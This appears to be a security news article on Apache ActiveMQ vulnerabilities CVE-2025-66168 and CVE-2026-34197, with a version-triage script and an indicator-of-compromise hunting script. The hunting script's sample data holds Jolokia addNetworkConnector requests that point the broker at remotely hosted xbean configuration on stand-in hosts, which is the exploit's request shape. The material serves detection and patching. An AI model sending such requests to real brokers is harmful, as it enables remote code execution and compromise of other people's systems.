🎯 Two flaws in Apache ActiveMQ, a messaging system used by many companies, could let attackers crash it or take control of it. Fixes have been available for weeks, yet thousands of exposed servers still haven't been patched. It's like knowing your lock is broken but not bothering to replace it.
What Happened
A medium-severity flaw has been disclosed in Apache ActiveMQ, a widely deployed open-source message broker. The vulnerability, tracked as CVE-2025-66168, allows an authenticated attacker to send malformed packets that crash the broker, resulting in a Denial-of-Service (DoS) condition. Security researcher Gai Tanaka reported the issue, and Apache maintainers later confirmed it on the project mailing list.
Alongside it, a far more serious remote code execution (RCE) vulnerability, tracked as CVE-2026-34197, has been disclosed in Apache ActiveMQ Classic. The bug has been present in the codebase for 13 years and was found by Horizon3.ai's Naveen Sunkavally with the help of the AI model Claude. It stems from improper input validation in ActiveMQ's Jolokia JMX-HTTP bridge and allows an authenticated attacker to execute arbitrary OS commands on the broker host.
Scanning by the nonprofit security organization Shadowserver shows that 6,476 Apache ActiveMQ servers exposed to the internet are vulnerable to the ongoing attacks exploiting this high-severity code injection vulnerability. As of April 22, 2026, Shadowserver had identified 6,476 IP addresses as vulnerable based on version checks, most of them in Asia (approximately 3,000), North America (1,409) and Europe (1,334).
Despite the severity of CVE-2026-34197, nearly 6,500 instances remained unpatched weeks after disclosure. IT analyst Rob Enderle underlined the urgency, stating that taking 12 days to patch is essentially a suicide note for networks, especially in a landscape where attackers can weaponize vulnerabilities almost instantaneously using AI tools.
CISA has recently added CVE-2026-34197 to its Known Exploited Vulnerabilities (KEV) catalog, indicating that the vulnerability is actively being exploited in the wild. The agency has mandated that federal agencies patch this vulnerability by April 30, 2026, under Binding Operational Directive 22-01. This directive emphasizes the urgency of addressing known vulnerabilities that pose significant risks to federal networks.
The RCE vulnerability carries a severity score of 8.8 (high) and affects Apache ActiveMQ Broker versions prior to 5.19.4 and versions 6.0.0 up to but not including 6.2.3. Sunkavally noted that the bug was missed for so long because it arises only from the interaction of independently developed components: Jolokia, JMX, network connectors and the VM transport. Each behaves correctly in isolation; chained together, as the indicators of compromise later in this article show, they let a Jolokia management call point the broker at remotely hosted configuration.
The discovery itself was greatly accelerated by AI: Sunkavally said that analysis which would have taken him a week by hand took Claude about 10 minutes. Stitching together a chain of components that had gone unnoticed for years illustrates what AI can contribute to vulnerability research.
Importantly, although the RCE normally requires credentials, many deployments still run with default username and password combinations such as admin:admin. Worse, on versions 6.0.0 through 6.1.1 no credentials are needed at all: a separate vulnerability, CVE-2024-32114, left the Jolokia API exposed without authentication in those releases, so an attacker can invoke management operations through the API and chain straight into remote code execution.
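As an added example (not code from Apache, Horizon3.ai or Shadowserver), the following Python script turns the version ranges quoted above into a triage check of the kind that Shadowserver's version-based counts rely on. It classifies each broker into the unauthenticated window (6.0.0 through 6.1.1, where CVE-2024-32114 removes the credential requirement), authenticated-only exposure, or not affected. The host inventory is constructed for illustration, and a version check says nothing about whether admin:admin is still in place or whether the Jolokia endpoint is reachable from the internet; those need separate checks.

```python
"""Version triage for CVE-2026-34197 and the CVE-2024-32114 window.

Added example, not code from Apache, Horizon3.ai or Shadowserver.
Affected ranges are the ones quoted in the article: ActiveMQ Classic
before 5.19.4, and 6.0.0 up to but not including 6.2.3; Jolokia is
served without authentication on 6.0.0 through 6.1.1.
"""
import re
from dataclasses import dataclass

RCE_FIXED_5X = (5, 19, 4)              # everything older than this is affected
RCE_RANGE_6X = ((6, 0, 0), (6, 2, 3))  # [6.0.0, 6.2.3) is affected
NOAUTH_6X = ((6, 0, 0), (6, 1, 2))     # [6.0.0, 6.1.2): Jolokia without auth

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) from '5.18.3', '6.1.1-SNAPSHOT', etc."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(part) for part in m.groups())


@dataclass
class Triage:
    version: tuple
    rce_vulnerable: bool   # CVE-2026-34197 reachable with valid credentials
    unauthenticated: bool  # CVE-2024-32114 also present: no credentials needed

    @property
    def label(self):
        if self.unauthenticated:
            return "unauthenticated_rce"
        if self.rce_vulnerable:
            return "authenticated_rce"
        return "not_affected"


def triage(version_text):
    """Classify one broker by version alone."""
    v = parse_version(version_text)
    rce = v < RCE_FIXED_5X or RCE_RANGE_6X[0] <= v < RCE_RANGE_6X[1]
    noauth = NOAUTH_6X[0] <= v < NOAUTH_6X[1]
    # The unauthenticated window lies inside the RCE range, so noauth implies rce.
    return Triage(v, rce, noauth)


def summarize(inventory):
    """Count a (host, version) inventory the way a version-based scan would."""
    counts = {"unauthenticated_rce": 0, "authenticated_rce": 0, "not_affected": 0}
    for _host, version in inventory:
        counts[triage(version).label] += 1
    return counts


# Constructed inventory for illustration; hostnames and versions are made up.
SAMPLE_INVENTORY = [
    ("mq-01.corp.example", "5.18.3"),
    ("mq-02.corp.example", "6.1.1"),
    ("mq-03.corp.example", "6.2.3"),
    ("mq-04.corp.example", "5.19.4"),
    ("mq-05.corp.example", "6.1.2-SNAPSHOT"),
]

if __name__ == "__main__":
    for host, version in SAMPLE_INVENTORY:
        print(f"{host:22} {version:15} {triage(version).label}")
    print(summarize(SAMPLE_INVENTORY))
```

Brokers in the unauthenticated bucket should be taken off the network or upgraded first; the authenticated bucket is next, with a credential audit alongside the upgrade.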
Current Exploitation Trends
Recent telemetry data from Fortinet FortiGuard Labs has revealed dozens of exploitation attempts targeting the Jolokia management endpoints in Apache ActiveMQ Classic deployments, with activity peaking on April 14, 2026. This highlights the alarming speed at which attackers are exploiting newly disclosed vulnerabilities, often breaching systems before patches can be applied.
Shadowserver has begun daily internet scans for CVE-2026-34197 and has published a public dashboard to track the number of exposed ActiveMQ systems. Security teams are urged to identify vulnerable instances, verify installed versions, and restrict internet access where possible. Given ActiveMQ’s role in enterprise messaging and data pipelines, exposed management interfaces present a high-impact risk, potentially enabling data exfiltration, service disruption, or lateral movement.
Security Advisory
On April 8, 2026, the Apache Software Foundation published a security advisory (AV26-330) to address these vulnerabilities, particularly CVE-2026-34197. Users and administrators are urged to review the advisory and apply the necessary updates to mitigate risks associated with the vulnerabilities. The advisory specifically mentions that affected versions include Apache ActiveMQ Broker prior to 5.19.4 and versions 6.0.0 prior to 6.2.3.
Why Should You Care
If your organization runs ActiveMQ, these vulnerabilities bear directly on your operations: a successful attack could disrupt messaging, cause downtime and cost revenue. Think of it as handing someone a key to the front door: having a key does not mean they should be able to rewire the house.
The key takeaway here is that even authenticated users can pose a risk if vulnerabilities exist in the systems they access. It’s essential to stay informed and proactive about security to protect your data and services.
What's Being Done
CVE-2026-34197 has been fixed in ActiveMQ Classic. The fixed releases are the ones that close the affected ranges in the advisory, so upgrade to 5.19.4 or later on the 5.x line and to 6.2.3 or later on the 6.x line. Here's what you should do if you're using ActiveMQ:
- Apply the fixed release as soon as possible, and keep watching Apache's announcements for follow-up updates.
- Review your ActiveMQ configuration, replacing default credentials such as admin:admin.
- Limit access to ActiveMQ services, including the web console and the Jolokia endpoint, to trusted networks and users.
- If you run versions 6.0.0 through 6.1.1, treat this as an emergency: the Jolokia API is reachable without credentials on those releases, which makes the RCE unauthenticated.
Experts are closely watching the situation for any signs of exploitation. Organizations concerned they may have been compromised via the RCE bug should look in their ActiveMQ broker logs for network connector activity referencing vm:// URIs with brokerConfig=xbean:http. Other indicators of compromise include:
- POST requests to /api/jolokia/ containing addNetworkConnector in the request body.
- Outbound HTTP requests from the ActiveMQ broker process to unexpected hosts.
- Unexpected child processes spawned by the ActiveMQ Java process.
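The indicators above are straightforward to turn into a hunting script. The Python below is an added example, not code from Apache, Fortinet or Shadowserver, and the captured requests and broker log lines it runs over are constructed. Two points worth knowing: a Jetty request log records only the request line, so the addNetworkConnector check needs a proxy, WAF or packet capture that preserves POST bodies; and Jolokia also accepts operations as GET exec URLs, so the decoded path is inspected as well as the body.

```python
"""Hunt for the CVE-2026-34197 indicators quoted in the article.

Added example, not code from Apache, Fortinet or Shadowserver. Rules:
  jolokia-addNetworkConnector  request to /api/jolokia/ invoking addNetworkConnector
  vm-xbean-http                broker log line with a vm:// URI whose brokerConfig
                               is fetched over http(s) via xbean
The sample requests and log lines below are constructed; the addresses are
from the documentation ranges (RFC 5737).
"""
import re
from urllib.parse import unquote

JOLOKIA_PATH = re.compile(r"^/api/jolokia(/|$)", re.I)
ADD_CONNECTOR = re.compile(r"addNetworkConnector", re.I)
# vm://...?brokerConfig=xbean:http://... (or https); stops at whitespace or a quote
XBEAN_HTTP = re.compile(r"""vm://[^\s"']*brokerConfig=xbean:https?://[^\s"']*""", re.I)


def scan_http_requests(requests):
    """requests: iterable of dicts with 'src', 'method', 'path' and 'body'.

    Returns (rule, src, evidence) for each Jolokia request that invokes
    addNetworkConnector, whether as a JSON POST body or a GET exec URL.
    """
    hits = []
    for req in requests:
        path = unquote(req.get("path", ""))
        if not JOLOKIA_PATH.match(path):
            continue
        body = unquote(req.get("body") or "")
        if ADD_CONNECTOR.search(body) or ADD_CONNECTOR.search(path):
            uri = XBEAN_HTTP.search(body + " " + path)
            evidence = uri.group(0) if uri else path
            hits.append(("jolokia-addNetworkConnector", req.get("src"), evidence))
    return hits


def scan_broker_log(lines):
    """Returns (rule, line_number, uri) for broker log lines that reference a
    vm:// URI pulling its broker configuration from a remote xbean URL."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = XBEAN_HTTP.search(line)
        if m:
            hits.append(("vm-xbean-http", number, m.group(0)))
    return hits


# Constructed captures: one JSON POST, one GET exec URL, one benign read.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
             '"operation":"addNetworkConnector",'
             '"arguments":["vm://localhost?brokerConfig=xbean:http://203.0.113.7/b.xml"]}'},
    {"src": "198.51.100.9", "method": "GET",
     "path": "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost"
             "/addNetworkConnector/vm:%2F%2Flocalhost%3FbrokerConfig%3Dxbean:http:%2F%2F198.51.100.9%2Fb.xml",
     "body": ""},
    {"src": "10.0.0.5", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
             '"attribute":"TotalConsumerCount"}'},
]

# Constructed broker log excerpt in ActiveMQ's default log layout.
SAMPLE_BROKER_LOG = [
    "2026-04-14 03:12:55,004 | INFO  | Apache ActiveMQ 6.1.1 (localhost, ID:broker-1) started"
    " | org.apache.activemq.broker.BrokerService",
    "2026-04-14 03:13:02,118 | INFO  | Establishing network connection from"
    " vm://localhost?brokerConfig=xbean:http://203.0.113.7/b.xml to tcp://203.0.113.7:61616"
    " | org.apache.activemq.network.DiscoveryNetworkConnector",
    "2026-04-14 03:13:02,220 | INFO  | Network connection between vm://localhost#2 and"
    " tcp:///203.0.113.7:61616@61617 (broker-1) has been established."
    " | org.apache.activemq.network.DemandForwardingBridgeSupport",
]

if __name__ == "__main__":
    for hit in scan_http_requests(SAMPLE_REQUESTS) + scan_broker_log(SAMPLE_BROKER_LOG):
        print(hit)
```

A hit on either rule is a strong signal rather than proof on its own; pair it with the remaining indicators above (outbound HTTP from the broker process to the host named in the xbean URL, and child processes of the Java process) before declaring an incident.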
It’s crucial to remain vigilant and prepared as more information becomes available.
The rapid exploitation of CVE-2026-34197 underscores the need for organizations to prioritize patch management and vulnerability assessments, especially in critical infrastructure.